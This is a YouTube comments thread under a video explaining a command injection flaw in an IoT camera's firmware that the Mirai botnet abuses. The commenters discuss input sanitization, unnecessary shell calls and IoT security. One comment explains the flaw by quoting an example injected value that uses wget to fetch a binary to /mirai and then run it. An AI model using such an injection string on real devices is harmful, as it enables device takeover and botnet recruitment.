this vulnerability shouldn’t even exist

  Рет қаралды 220,708

Low Level

Low Level

Күн бұрын

Пікірлер: 940
@LowLevelTV
@LowLevelTV 2 ай бұрын
go check out lowlevel.academy 😎
@regurmaster3519
@regurmaster3519 2 ай бұрын
Need student discount too costly for Indian students from middle class family
@Mohojo
@Mohojo 2 ай бұрын
Hey Ed, Why not create a course for reverse engineering?
@PremiereStoss-qm9un
@PremiereStoss-qm9un 2 ай бұрын
Hey Ed, are your courses beginner friendly? I have been learning C and still very much a newbie. I am interested in your courses, mainly C and Assembly. However, you are so advanced in your knowledge that I am nervous about joining to find out that it is way over my skill level, etc. I really am looking for an assembly that is ZERO to Hero type of course....
@sprinteroz2239
@sprinteroz2239 2 ай бұрын
is there a firmware that works on most cameras that is safe to use ?
@davidcraig8106
@davidcraig8106 2 ай бұрын
you should bring up this vid to Wendell at Level 1 Techs EDIT: he said years ago there's no standards. he even was working on setting up a DMZ type thing that looked at every single packet that went in and out of the IoT devices he used. without standards and open source, IoT is a risk to int'l security. maybe not the gov't, but int'l meaning the internet as we know it.
@martinzihlmann822
@martinzihlmann822 2 ай бұрын
the S in IoT stands for Security
@yomajo
@yomajo 2 ай бұрын
@@martinzihlmann822 original
@davidyoder5890
@davidyoder5890 2 ай бұрын
This is perfect. Well done sir.
@GREG_WHEREISTHEMAYO
@GREG_WHEREISTHEMAYO 2 ай бұрын
But there’s no s
@flippy1589
@flippy1589 2 ай бұрын
@@GREG_WHEREISTHEMAYO that's the joke
@TheSkypeConverser
@TheSkypeConverser 2 ай бұрын
Love this
@josephlabs
@josephlabs 2 ай бұрын
0 sanitization on inputs that has a connection to system calls is insane.
@pfqniet
@pfqniet 2 ай бұрын
What's crazy is that there *is* sanitisation. Just above the offending line there is a line that removes character 0x22 from the input. That is the double-quote character, which would indeed be a way to attack the injection vulnerability. So somebody thought to defend against a possible injection, and still botched it. In this case, I would presume the LED value should be a number so just... Use %d instead of %s???
@InventiveDingo
@InventiveDingo 2 ай бұрын
​@@pfqnietThere's technically at least one extra step required (strtol() or similar to parse the string to a number), but yes, not hard. Maybe some quick range checks for good measure. When validating input, always validate maximally. Of course, running shell commands is the wrong way to do this anyway. I would reject this code review and have a friendly chat with the author.
@bothieGMX
@bothieGMX 2 ай бұрын
Always whitelist valid input and reject everything else. However you do it, doesn't matter.
@ChasOwens
@ChasOwens 2 ай бұрын
@@pfqniet You can’t just change the %s to a %d; pcVar2 is a string (which is insane because they already are parsing it into an int). A better thing would be to use the iVar4 variable instead and then use %d. But even that is wrong. Look at what the commandline code is doing: writing a value to a file. This is pure laziness. The programmer should have just opened the /proc/driver/pwm file and written iVar4 to it. That would have removed even the possibility of a commandline injection since no shell would be launched. It even would be more efficient.
@ohokcool
@ohokcool 2 ай бұрын
Reminds me of when I accidentally put a backslash at the end of a password (because it’s right next to the enter key) and due to lack of sanitization it crashed the whole system that it was running on. 😂 I’m not going to say which company but it was a massive one that put the services in the hands of 2 people who didn’t think to sanitize password fields
@coreymartin9630
@coreymartin9630 2 ай бұрын
This 100% counts as gross negligence, if my crappy online Python course can do user input validation, a _security_ company should be able to
@CrimeyCenter
@CrimeyCenter 2 ай бұрын
Not when they hire the lowest common denominator coders and don't do your own penetration testing and code reviews with security experts.
@JJFX-
@JJFX- 2 ай бұрын
Hell, I've made batch files that do a better job at input validation than this.
@kentacy69
@kentacy69 2 ай бұрын
@@CrimeyCenter that sounds... Grossly negligent
@edwardallenthree
@edwardallenthree 2 ай бұрын
Exactly! This is a classic injection vulnerability. It might as well serve as an example of what not to do, and reminds me of several examples of what not to do when I learned how to do CGI programming in Perl in the 1990s. Why are they using the shell to do this? Why are they that lazy?
@jino139
@jino139 2 ай бұрын
There's no good pay for embedded systems cybersec positions.
@xXYourShadowDaniXx
@xXYourShadowDaniXx 2 ай бұрын
And THIS is why you run your Smarthome devices in their own VLAN with NO access to your other VLANs
@nicholasj3213
@nicholasj3213 2 ай бұрын
Basically impossible for regular people.
@andreffrosa
@andreffrosa 2 ай бұрын
Regular "routers" don't allow you to even do that even if people knew how
@monkemode8128
@monkemode8128 2 ай бұрын
​@@nicholasj3213Yeah and for many it would require new devices. Unless you made your purchasing decisions with that in mind, but the average person doesn't.
@scheimong
@scheimong 2 ай бұрын
This. I had all my IP cameras placed into a VLAN that can only talk to one specific local IP which hosts my NVR software (Frigate), which runs in a non-privileged container (podman is great), on an SELinux-enabled RockyLinux 9 box. If an attacker can break in and out of this onion they can have all my data 😁
@RiversJ
@RiversJ 2 ай бұрын
@andreffrosa That sadly is just a case of you get what you pay for, going with the ISPs wormbox or getting the cheapest option despite most people knowing someone atleast slightly technical person to ask for recommendations.
@henrijohansson2482
@henrijohansson2482 2 ай бұрын
0:36 missed opportunity to say "Another day and another Zero-Day"
@MessyMasyn
@MessyMasyn 2 ай бұрын
sounds like the opening to a song
@subtlewolf
@subtlewolf 28 күн бұрын
day %= 2
@ExEBoss
@ExEBoss 26 күн бұрын
⁠@@subtlewolf Actually, it’d be `day %= 1`
@ExEBoss
@ExEBoss 26 күн бұрын
@@subtlewolf Actually, it’d be day modulo 1
@ExEBoss
@ExEBoss 26 күн бұрын
*@subtlewolf* Actually, it would be day modulo 1 *(KZbin* bots keep eating my comments)
@paulramasco6769
@paulramasco6769 2 ай бұрын
I didn't realize Mirai was still going on. For my cybersecurity class a few years ago I did a report on zombie botnets and this was a major thing. Its crazy that camera vendors (who Mirai was targeting before) didn't shore up that hole.
@V3racious3
@V3racious3 2 ай бұрын
It isn't a specific hole. That''s what she said.
@asteriks_hardcore
@asteriks_hardcore 2 ай бұрын
Mirai, qbot and other families never stopped being active, due to there being hundreds of variants
@ZippyZen-pw5uq
@ZippyZen-pw5uq 2 ай бұрын
camera vendors: meh (continues spinning in chair)
@davidcraig8106
@davidcraig8106 2 ай бұрын
They care about profits and not security. Like seriously. Camera software isn't open source. There's no standards. How in the hell is the average consumer supposed to know. We need standards yesterday and a campaign to say just what is and what isn't acceptable.
@gamersunite9026
@gamersunite9026 2 ай бұрын
mirai is MOST DEFINITELY still going on. bunch of servers still getting requests from the botnet to try and backdoor through /cgi-bin/
@PeterZaitcev
@PeterZaitcev 2 ай бұрын
Wait a second, why is it unpatchable if it allows executing external code? You could install the update _fixing_ that vulnerability _using_ that vulnerability!
@zombieregime
@zombieregime 2 ай бұрын
Yes. And there have been computer viruses that fixed vulnerabilities the vendors refused to address. There was at least one that I know of regarding an ISP router.
@ujiltromm7358
@ujiltromm7358 Ай бұрын
There are also viruses that fix the vulnerabilities they use to penetrate the victim system, so other bad actors can't enter through the same door. It do be a competitive environment.
@Bomkz
@Bomkz Ай бұрын
@@ujiltromm7358 there's also that story of a business opting not to remove a cryptomining malware because the ones who made it kept their systems updated and patched out any other people trying to hack it just to keep it to themselves.
@Ilix42
@Ilix42 2 ай бұрын
Man, "spray and pray" is never how you want a successful security breach to be described.
@Car0linaPh03nix
@Car0linaPh03nix 2 ай бұрын
I disagree about vendors not making firmware available. Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone? The issue is vendors writing shitty code and, more importantly, either not patching it when vulns are found, or, often, not even having the capability to patch it.
@TrippSC2
@TrippSC2 2 ай бұрын
I think the worst of all possibilities is to have unencrypted firmware available without source. If the source was available, you at least increase the likelihood that security researchers may at least have a chance to catch bugs and propose fixes.
@Adesterr
@Adesterr 2 ай бұрын
The golden rule in IT security is "obscurity is not security". This doesn't mean that keys should be published like microsoft likes do to "accidentally", but that the algorithm to protect something shouldn't rely on not being published. In the end it comes down to just desoldering the ROM with the firmware and reading its content. So, yes, every professional IT security expert will tell you that the Firmware should not rely on being a secret.
@TrippSC2
@TrippSC2 2 ай бұрын
@@Adesterr If your point is that obscurity shouldn't be the entirety of your security strategy, we're in total agreement. My point is that, from a practical standpoint if making source available is off the table, obscuring the firmware provides some level of deterrence from the exploit being exposed. This along with diligent internal testing and code quality standards is a more reasonable security strategy than not obscuring the firmware.
@nomore6167
@nomore6167 2 ай бұрын
"Is FOSS also insecure because the source is available? Or is it MORE secure, because it can be audited by anyone?" - It is not more secure. More accurately, the question of whether open source software is more or less secure than closed software is unknowable because we don't know how secure either category really is. I would, however, point to Ed's 21 April 2024 video, "this is a warning to anyone using php", which highlighted a 24-year-old buffer overflow vulnerability in glibc. If "it can be audited by anyone" really meant superior security, then that vulnerability would not have persisted for 24 years. I do agree with your original point, however -- the firmware should be available, and security through obscurity is no security at all.
@ErazerPT
@ErazerPT 2 ай бұрын
It's neither. If the code is secure, both people checking it for "secure" or "vulnerable" will find nothing. Now if it's NOT secure, and let's assume 100% competency, IF you have someone checking it for security they will spot it. IF. And IF it's any software with any decent amount of users, someone WILL be looking for vulns and spot it. The "many eyes" thing only works IF there's actually many (competent) eyes looking out for things...
@luxploit
@luxploit 2 ай бұрын
I think Ed's old Router is a Netgear Nighthawk, probably an R7000. I recognise the hideous casing and 3 way antenna setup. I flashed mine with FreshTomato, way better then NG's stock fw
@chinesepopsongs00
@chinesepopsongs00 2 ай бұрын
My Guess was the R6400 because the PCB layout is different. Unless there is a revision of the R7000 that looks like the R6400 which i have never seen then i think it must be a R6400.
@VladSuperKat
@VladSuperKat 2 ай бұрын
Or Tp-Link those were forever vulnerable routers :D
@reaperinsaltbrine5211
@reaperinsaltbrine5211 2 ай бұрын
@@VladSuperKat Yupp...but you can change the firmware on them. The worst was the blunder when they changed the chipset from Marwell to some Broadcom crap: oh boy, are those vulnerable at the hardware level :D
@kirglow4639
@kirglow4639 2 ай бұрын
Was about to guess Netgear. Welp
@jongeduard
@jongeduard 2 ай бұрын
At least with a google search I could find photographs and articles about it, the shape of these Netgear routers is pretty recognizable. And I new about the trademark that it's known for the problems.
@Jirodyne
@Jirodyne 2 ай бұрын
Companies, I would argue ARE 100% Liable, under Express Warranty. If you buy a product, they are expressing a warranty that there is nothing critically wrong or harmful with that item. A massive issue like this? I would 100% argue that breaks warranty and they are 100% Liable for any damage caused by the virus that was installed on your device because of their negligence of securing the device. But then again, I'm not a lawyer, and the courts don't care about consumers would side with the company who is paying them behind the scenes.
@JJFX-
@JJFX- 2 ай бұрын
If they made no significant attempts at resolving the issue you probably could but the courts are notoriously behind the times on these issues. The other problem is how many of these products flooding Amazon are just overseas companies.
@jbird4478
@jbird4478 2 ай бұрын
Software companies are notoriously exempt from liability. Almost every software product has a user agreement that basically tells you they are not responsible even if the software is entirely unfit for its purpose and accidentally blows up your house instead. The degree to which such user agreements can be uphold in the court of law varies, but in general it does. Judges know nothing about software so they rely on industry experts, who basically explain them it's some sort of extremely complex magic that cannot possibly come with any sort of guarantees.
@sasjadevries
@sasjadevries 2 ай бұрын
@@jbird4478 Except that's for the software itself, not for the physical hardware product that just happened to contain that software. It's the responsibility of the manufacturer of the IoT device to figure this out. Either they develop their own stuff, or they can test open software, or they can hire a software company that's certified and has liability written in the contract. If an IoT device burns your house down, then it doesn't matter if it's a hardware problem or a software bug.
@forlexer
@forlexer 2 ай бұрын
Go sue China....oh wait you can't
@LTPottenger
@LTPottenger 2 ай бұрын
Judges decide any case however they want, including jury trials because they control exactly what the jury sees. So in the miu case they did not show the video of the 'children' attacking the old man only selected still photos, for example.
@Trenjeska
@Trenjeska 2 ай бұрын
Full access to firmware is not a bad thing. In fact, it should be a requirement for any device. How else are you going to re-flash the device or maintain it without dependency on the manufacturer that may or may not exist anymore?
@gairisiuil
@gairisiuil 2 ай бұрын
security by obscurity is always safe until isn't, at which point it REALLY isn't
@sasjadevries
@sasjadevries 2 ай бұрын
Why does this security camera have an operating system like linux to begin with? All it needs is 1) a bootloader, 2) minimalist networking software, 3) video encoding stuff, and some encryption algorithm that can be part of the networking binary or the video binary. The whole thing could be a single binary and be fully embedded, or it can be a few binaries running on freeRTOS. Why would a camera need wget? Why would it need bash? What's the upgrade path of "a camera"???
@chocolate_squiggle
@chocolate_squiggle 2 ай бұрын
@@sasjadevries A crappy standalone camera I bought 10 years ago had its own embedded HTTP server, so you could configure all sorts of options. Not all of them connect to a central controller.
@mapu1
@mapu1 2 ай бұрын
@@sasjadevries lets you do facial recognition and stuff locally, and compress the archives and so on. If you are doing bunch of stuff like that, at a point you are better off just using linux, cause you just let the user put on whatever they want on it instead of writing custom software and drivers. That said just don't connect your stuff directly to the internet. It's gonna get hacked.
@sasjadevries
@sasjadevries 2 ай бұрын
@@mapu1 That is a good point, but with a catch. I would rather do "local" object recognition on a server that multiple cameras connect into. Mix and match any server with any software and any camera, without vendor lock-in. The cameras could be just wired analog ones, or at most something digitally compressed. Doing all the processing on the camera itself would make sense if you install the camera in a way that it can be jammed, because it has to be wireless, because it's on moving subject. Or if you only need one or two cameras for your property, and have no plans for expanding surveillance later.
@makebreakrepeat
@makebreakrepeat 2 ай бұрын
10:07 Thanks LLL, your the best
@_ilincic
@_ilincic 2 ай бұрын
@@makebreakrepeat quote
@be1tube
@be1tube 2 ай бұрын
Replying. Agreeing. (algo bait)
@1337bitcoin
@1337bitcoin 2 ай бұрын
This
@Egryzilon
@Egryzilon 2 ай бұрын
Agreed
@ByronKirby
@ByronKirby 2 ай бұрын
Had to zoom in and it was a bit fuzzy, but certainly legible. Thanks LLL
@Lupinicus1664
@Lupinicus1664 2 ай бұрын
You are providing a great service, both by explaining interesting topical exploits but also by providing real courses to get people better educated. I am now retired after 40+ years in IT, starting with 25 years of assembly programming on realtime kernels in the mainframe world, then transitioning to security. Lack of knowledge about how the machines actually work is very common amongst modern programmers. Improvements in knowledge should lead to more secure architectures and code. Please keep up the good work.
@naimah92
@naimah92 2 ай бұрын
The attitude of “it’s just software” needs to go away. There needs to be an engineering rigor applied to get correct(ish) and safe software. We don’t allow civil engineers to self certify so why are we doing that with software?
@glynnetolar4423
@glynnetolar4423 2 ай бұрын
This started in the 70s where software was given special consideration. No consumer protections, licensing restrictions, etc. Maybe these things and CrowdStrike may change things.
@rethardotv5874
@rethardotv5874 2 ай бұрын
@@glynnetolar4423because everybody and their mom can write software and publish it. This is anti elitist, anarchistic and awesome for all of us. Medical device software needs to be certified bc it can kill ppl but nobody got ever killed by a software bug in a surveillance cam.
@andrewpredmore2968
@andrewpredmore2968 2 ай бұрын
It's supply and demand. The need for software developers has grown exponentially (even logarithmically) over the last few decades. There are literally tens of millions of developers all over the world, and I would bet 99% of them do not have anything near a masters degree in engineering. Even if all companies required them to get advanced degrees and were willing to pay for that, there just aren't enough schools that could handle the load. And let's face it, most developers just start out working on business logic in spreadsheet macros, or modifying JavaScript. Eventually, they are asked to work on something that is over their head.
@sasjadevries
@sasjadevries 2 ай бұрын
There are quite strict rules for certain categories of software, OD-178, iso26262 and the whole safety-critical branch for medical equipment, aviation, etc. Then the smarter governments usually have certifications for software handling personal data, payments, etc. But this stuff should just be broader, such that you had at least some of this for software in household appliances.
@sasjadevries
@sasjadevries 2 ай бұрын
@@andrewpredmore2968 I would argue, that this demand is unjustified. Firstly, most agile developers are like stacking a framework on top of a framework, for something that could have been vanilla html+css generated from some markdown. Or they are shell scripting and pipelining filtering software A into filtering software B into conversion software, for what could have been a single shader. Secondly, these soydevs mess up, so you need another soy dev fixing (i.e. ducktaping) the other's work, and a scrum master and a selfproclaimed tester. Thirdly, even a small businesses, like a local bakery with 3 locations in your city, feels like it needs it's own app, because a website and PWA is not enough. And why would people make a few good tools, when you could make thousands of mediocre ones? Finally, that spreadsheet script is usually for a job that could have been automated away, and shouldn't have been done in a spreadsheet to begin with. p.s. ducktape is not a typo, "duck" is the canvas that the tape was made out of, before it was used for ducts😆.
@HinaraT
@HinaraT 2 ай бұрын
The worst part is that the bug would not have occured if they just simply wrote directly to the file as the kernel would have refused it.....
@timoadler6356
@timoadler6356 2 ай бұрын
indeed. What's this whole echo and redirection stunt for anyway? Does the shell have higher priv than the cgi Factory binary or what?
@AubreyBarnard
@AubreyBarnard 2 ай бұрын
@@timoadler6356 I'm guessing that the echo is just a shortcut in the code to writing to the particular file, as @TheRobbix1206 describes. I'm guessing that one can control the brightness by writing certain values into that particular file, just like one can control the swapiness of the Linux kernel by writing into '/proc/something/swapiness'. (I don't remember the specific file, but hopefully you still understand what I'm trying to say.)
@AubreyBarnard
@AubreyBarnard 2 ай бұрын
​@@timoadler6356(I forgot:) That is, I don't think it has anything to do with privilege escalation. (I'd have to go back and watch the video again to make sure, by carefully noting what was executed and with what specific file(s).)
@AubreyBarnard
@AubreyBarnard 2 ай бұрын
Yeah, it's as I thought. After zooming in (on my hand computer that has radios), the specific shell command is `echo DUTY_RATIO="%s" > /proc/driver/pwm`. So it looks like 'pwm' is a virtual file where one can write certain configuration to control the camera. (The camera reads that file, parses it, and acts accordingly.) So, while the kernel wouldn't prevent access to that file (as OP suggests), presumably the parser for that file would error out upon finding an arbitrary string instead of the expected literal atomic value (float? int? word?), much less executing said arbitrary string, which could be something like `DUTY_RATIO=wget 0.0.0.0 -o /mirai && /mirai`.
@AubreyBarnard
@AubreyBarnard 2 ай бұрын
@TheRobbix1206 If the binary has permission to execute a shell command that writes to a file, then the binary should have permission to write directly to that file, so the kernel wouldn't deny opening the file (unless the effective user somehow got changed, but I don't see anything in the code that does that).
@DadofScience
@DadofScience 2 ай бұрын
I've not embraced IoT stuff because I have no faith in businesses to create products that are "safe" if they have no external obligation to do so. For example, pharmaceuticals are heavily regulated for good reason because they have the potential to cause great harm. I don't want stuff like that in my home, thanks. Great work, Ed.
@lorenzopazzification
@lorenzopazzification 2 ай бұрын
It's funny that the vulnerability is in the line with the "safe_printf"
@thecakeredux
@thecakeredux 2 ай бұрын
Literally in my very first lesson on C way back when, I learned what input sanitization is.
@madson-web
@madson-web 2 ай бұрын
"the internet of things sucks" YES
@Kane0123
@Kane0123 2 ай бұрын
Buying smart devices is ironically a dumb thing to do.
@benarcher372
@benarcher372 2 ай бұрын
Why is anyone surprised that bugs like this exist? The number of connected devices out there is enormous. The companies developing these are probably more interested in launching the product than spending yet another dollar on testing or implementing a safer language. I have no idea how to fight this. Regulation? Informed users? Videos like this :-) -> definitely! Thanks for a good walk-through.
@LUEcifer
@LUEcifer 2 ай бұрын
Router looks like a Netgear Nighthawk R7000.
@YaySyu
@YaySyu 2 ай бұрын
Nighthawk lineup are insecure.
@OVERKILL_PINBALL
@OVERKILL_PINBALL 2 ай бұрын
@@YaySyu What about when you run DD-WRT or OPEN-WRT latest kernels?
@MelroyvandenBerg
@MelroyvandenBerg 2 ай бұрын
R6700
@MelroyvandenBerg
@MelroyvandenBerg 2 ай бұрын
Why not just install OpenWRT?
@YaySyu
@YaySyu 2 ай бұрын
@@MelroyvandenBerg You cant do it on most of them without flashing the board. I had to open mine up to flash it.
@CoreDump451
@CoreDump451 2 ай бұрын
I actually made a presentation about Mirai back in 2018 for my security class. Man it feels like yesterday
@IanBPPK
@IanBPPK 2 ай бұрын
I had a legal and ethics in computing course during the semester that the October 2016 Dyn ttack occurred. My group's assigned topic had to do with IoT devices. We had half of our project handed to us on a silver platter with that attack.
@MSThalamus-gj9oi
@MSThalamus-gj9oi 2 ай бұрын
When people first started talking about networking elements and appliances in the home, I thought it was a pretty neat idea. When that became a reality and all those devices were connected to the Internet, I thought people were absolutely *insane* for using any of them. The closest thing to an IoT device I use is a Roku, and i'm happy to keep it that way. I even disable networking on my retro gaming PCs.
@nomore6167
@nomore6167 2 ай бұрын
But how will I cook my food if my microwave can't connect to the Internet? How will I heat my home if my thermostat can't connect to the Internet? How will I know when my laundry is done if my washer and dryer can't connect to the Internet?
@MSThalamus-gj9oi
@MSThalamus-gj9oi 2 ай бұрын
@@nomore6167 I mean, I get that you're joking, but it'll get to that point! It's already true that, where I live, I need to have a cell phone with its own separate data plan in order to activate a new modem for my cable broadband service. It's just ludicrous, but it's true....
@nomore6167
@nomore6167 2 ай бұрын
@@MSThalamus-gj9oi Sadly, I believe you're right that it'll eventually get to that point. Either probably be a combination of people's laziness/"convenience" (wanting to be able to access everything from their phone), company greed (data collection / analytics for everything), company control, and planned obsolescence. Personally, I think it's bad enough right now when we need to go to a company's website to download the user manual for pretty much everything.
@nomore6167
@nomore6167 2 ай бұрын
@@MSThalamus-gj9oi With regard to needing a cell phone to activate a new modem for your cable broadband service, what's the reason for that (if you don't mind me asking)? If it's because it requires an app, then it's even worse than simply requiring a cell phone; it'll probably require a relatively new cell phone because most companies will support only the latest device OS and maybe the one before that. I'm at that point right now with Capital One, my credit card provider. I have an iPhone 6s. Sure, it's 8 years old, but it does everything I need it to do. Except Apple doesn't allow this phone to upgrade to iOS 16.0 or above, and the Capital One app now requires iOS 16.0 or above. More accurately, the app says it supports my phone, and it will install on my phone, but when you open it, it says you need to upgrade to the latest iOS. So I lost the ability to get realtime notifications (about new charges, payment confirmation, fraud alerts, etc) and control my credit card from my phone simply because I refuse to buy a new phone.
@woosix7735
@woosix7735 2 ай бұрын
If its not already regulated, this kind of software absolutly should be. And not just slaping the copany on the wrist when it gets found out, but something to prevent this from happening in the first place.
@slugfiller
@slugfiller 2 ай бұрын
The bigger question is: Why `echo` into a file instead of, I dunno... just `fopen`ing the file and writing into it. It's not like `echo` is some sort of black magic, nor is the bash file pipe operation. I can't imagine that a program that can execute bash doesn't have access to `fopen`.
@c128stuff
@c128stuff 2 ай бұрын
Lol, that flaw is so obvious, seeing the reverse-engineered code just hurts my eyes.
@jay3368
@jay3368 2 ай бұрын
I am new to all of this and watch because its an interest. I had to go look up what input sanitation was and why you do it in code. After doing that, I watched the part where you explain the vulnerability and it made so much sense
@von...
@von... 2 ай бұрын
"thanks Triple L, you're the best! I am a ***generic mobile user agent*** and I am very ***positive adjective*** that you were thinking of us!" ***actually viewing on a 1000:45 mega ultrawide with 10k smell-o-vision*** "...pft they dont even know im only pretending to be a mobile user"
@neniugrava
@neniugrava 2 ай бұрын
I'm a mobile user agent, and I approve this message
@dragnl0rd
@dragnl0rd 2 ай бұрын
0:42 Took me a minute to nail it down, but that specific router is the Netgear AC1900 wifi router (r7000). I can tell it's that rather than the AC1750 because yours has the usb port next to the wan port.
@GetFitEatRight
@GetFitEatRight 2 ай бұрын
FreshTomato FW all I'm going to say.
@ProfRoxas
@ProfRoxas 2 ай бұрын
right when the exploit was shown, i failed to understand how someone could even do this, like, i fail to process how someone could do this and be like "what could go wrong" feels like programming became too accessible and we get vulnerabilities that could be prevented by thinking
@DarkSwordsman
@DarkSwordsman 2 ай бұрын
I don't see you in my recommended often, but I am glad I clicked on this. I didn't realize you actually went through the binary and what not. It's really cool to see you do a technical dive in a layman-way, rather than just say "there is a vulnerability! ahh!"
@capability-snob
@capability-snob 2 ай бұрын
The punch line is that they call atoi(), but don't use that value in the substitution!
@BillLambert
@BillLambert 2 ай бұрын
Came down here for exactly this. They were so close, just use %d and that int var instead of the string... definitely a copy-paste-compile "hey it works" SHIP IT!
@D4MNF0xy
@D4MNF0xy 2 ай бұрын
I'm always baffled by how those companies apparently never use code scans. I've actually made a similar mistake, that got flagged by a code scan before any deployment. I forgot to check one input which resulted in a potential full read access for the server directory. Joke is: I've could have sworn, that I did the check in the other module.
@ewhac
@ewhac 2 ай бұрын
...I _cannot_ believe that code passed any kind of review. "Y'know, I could write three lines of code that fopen()s a file and fprintf()s to it, but that's for suckers. I think I will _LAUNCH A SHELL TO RUN AN ECHO COMMAND!"_ Anyone in the chain who let those lines of code pass by them (in that screenshot there's at least two other examples of completely unnecessary shell commands) -- from the original coder to the reviewers to the release engineers to the managers of same -- should find themselves in front of HR arguing why they should continue to work for the company.
@sirgouki6207
@sirgouki6207 2 ай бұрын
A shell that no one would normally see no less. I worked security at a company I'm not going to name for a specific reason: guess what cameras and software they used? To get access to that print out, you gotta jump through some menus and you lose screen real estate, which is something you don't want when you're watching cameras for thieves and accidents. However, we had 3 monitors, so I'd have the camera's on 2 of them as I could fit just about every single camera in the whole warehouse that way, and still see what was happening, and on my left most monitor I had the thing that was displaying these messages and a notepad open. I'm also thankful that they had it set up in a way that my layout was tied to my account on their network, so when I logged into the computer and ran the software everything was already the way I had it, and I didn't have to worry about other guards messing with my shit. I actually was able to notify the people in charge of security multiple times that cameras were malfunctioning before it showed in the software by having that thing up, but the average user would have no idea it was there (I even had to teach the head of security how I did it, because she had no idea it was a thing).
@anthonywalker6268
@anthonywalker6268 2 ай бұрын
It's actually better that they do post it, because it has to be fixed on sight.
@bits360wastaken
@bits360wastaken 2 ай бұрын
What part of "unpatchable" do you not understand?
@anthonywalker6268
@anthonywalker6268 2 ай бұрын
@@bits360wastaken what part of people don't have the power of prophecy do you not understand.
@GameDevMadeEasy
@GameDevMadeEasy 2 ай бұрын
@@bits360wastaken But... It is fixable with a new firmware version release. As long as users install the new firmware version, the issue is patched. Yes, it technically is unpatchable because they can't just send the update to the user's device to auto install it, but the post calling it unpatchable is a red herring to begin with as it makes people assume that the issue can't be fixed at all, which is not the case.
@EricDMMiller
@EricDMMiller 2 ай бұрын
@@GameDevMadeEasy they could abuse the bug to force the system to download and install a firmware upgrade.
@GameDevMadeEasy
@GameDevMadeEasy 2 ай бұрын
@@EricDMMiller Companies can't do something like that as it is unethical and could lead them into legal hot water.
@rumplstiltztinkerstein
@rumplstiltztinkerstein 2 ай бұрын
There are very creepy people out there that get enjoyment from hacking cameras and recording them live on the dark web. Be very careful with cameras. Even your webcam.
@RubyCascade
@RubyCascade 2 ай бұрын
_Especially,_ with your webcam. I have a piece of blue tape over my MacBook’s camera, yes.
@rumplstiltztinkerstein
@rumplstiltztinkerstein 2 ай бұрын
@@RubyCascade Here is some info that I wish I didn't know about: Search for the tag "hacked camera" in adult sites. That raises our paranoia to levels high enough that we want to warn all of our friends about keeping cameras on.
@DavidTriphon
@DavidTriphon 2 ай бұрын
@@RubyCascade Once upon a time (10+ years ago) I was told that macbook cameras couldn't be powered without the green light turning on so that you knew it was being used. Later on I was told that it had been true but was no longer true, and could potentially be hacked at a firmware level. I have no idea of the validity of either of those claims.
@reaperinsaltbrine5211
@reaperinsaltbrine5211 2 ай бұрын
@@DavidTriphon If you don't have a switch that physically cuts power to it, then it can totally be controlled by software :/ You can actually buy smartphones whithout camera and even microphone (so you need a headset to even use it as a phone). You can even order them to be shipped in tamper-evident packaging :)
@Bramble20322
@Bramble20322 2 ай бұрын
@@reaperinsaltbrine5211 Those are prime targets for supply chain attacks, and factories that make consumer stuff arent profiling and hand picking people to assemble shit. I'd actually avoid that stuff like the plague if i was you. Tamper-evident packaging is just straight up marketing, its an illusion.
@ronny332
@ronny332 2 ай бұрын
Nothing really changed in the last 20 years. The people/companies still don't care about simple variable cleaning. Thanks for sharing 🙂
@tekneinINC
@tekneinINC 2 ай бұрын
4:36 : I’m gonna say that’s a Netgear Nighthawk?
@krisbruenn1082
@krisbruenn1082 Ай бұрын
I can see the code when I run the video in landscape mode on my phone. You are the greatest, and this video is a keeper.
@Fs3i
@Fs3i 2 ай бұрын
11:42 lmao, the noise of someone who is in despair
@catdisc5304
@catdisc5304 2 ай бұрын
Thanks triple L, you're the best!
@WaterGame7777
@WaterGame7777 2 ай бұрын
The realization of just "oh.... ohhhhh..... they're really doing " always gets me
@Karn0010
@Karn0010 2 ай бұрын
Not much of a programmer myself, but you break these things down so well that I get a basic understanding of why things like this are bad.
@hairetsu
@hairetsu 2 ай бұрын
this is so common, raw dogging http requests is the bread and butter of the tech industry, what validation? what sanitizing? who needs that!
@sprytnychomik
@sprytnychomik 2 ай бұрын
9:06 pro tip: try using fzf - a command-line fuzzy finder, for finding files and/or input lines. Works like a charm in CLI workflow.
@marklonergan3898
@marklonergan3898 2 ай бұрын
They did sanitize the input. They used a function with the word "safe" in its name before the system call, so they have met or exceeded the standard of IoT security.
@Rudxain
@Rudxain 2 ай бұрын
I hope this is sarcasm
@marklonergan3898
@marklonergan3898 2 ай бұрын
@@Rudxain yes and no. Saying they did sanitize was sarcasm. The jab at the lack of security in IoT wasn't - there is a horrible lack of security across the board
@Rudxain
@Rudxain 2 ай бұрын
@@marklonergan3898 LMAO
@Arina-hs4hi
@Arina-hs4hi 2 ай бұрын
I have zero clue what you are talking about 90% of the time but as a 2nd semester comp sci student, I love the structure of these videos! It’s fairly easy to follow along and it motivates me to learn more about cybersecurity:)
@Oler-yx7xj
@Oler-yx7xj 2 ай бұрын
I love how even for NSA, translating a word into Russian makes it sound hackerish
@AnotherFreakingDude
@AnotherFreakingDude 2 ай бұрын
11:42 When he _OOFd_ , I really felt that
@AndreSomers
@AndreSomers 2 ай бұрын
So, why is it claimed to be “unpatchable”, as this seems like quite a simple thing to fix.
@MorbidEel
@MorbidEel 2 ай бұрын
I think it is unpatchable in the sense that there won't be a patch available because it is a discontinued product
@TheDudeAbidesYo
@TheDudeAbidesYo 27 күн бұрын
It's always a treat watching your show. I always learn something new.
@arcticzomb
@arcticzomb 2 ай бұрын
Well, that’s why I keep my security cameras on their own local network :)
@RabbitWatchShop
@RabbitWatchShop 2 ай бұрын
Your cameras aren’t safe, either, Mr. 2000s era pre-emoji smiley face
@rmp5s
@rmp5s 2 ай бұрын
Werd. Mine are completely segregated...have their own router and everything.
@EximiusDux
@EximiusDux 2 ай бұрын
@@RabbitWatchShop wait until you hear about MSN Messenger and how emojis already existed back then during the early 00s. Some people don't like to use image based smileys / emoji.
@methamphetaminer
@methamphetaminer 2 ай бұрын
@@RabbitWatchShop ok mossad
@bjorntorlarsson
@bjorntorlarsson 2 ай бұрын
That's why I don't use cameras. Actually, the real reason is that I don't find myself all that photognic anyway.
@chocolate_squiggle
@chocolate_squiggle 2 ай бұрын
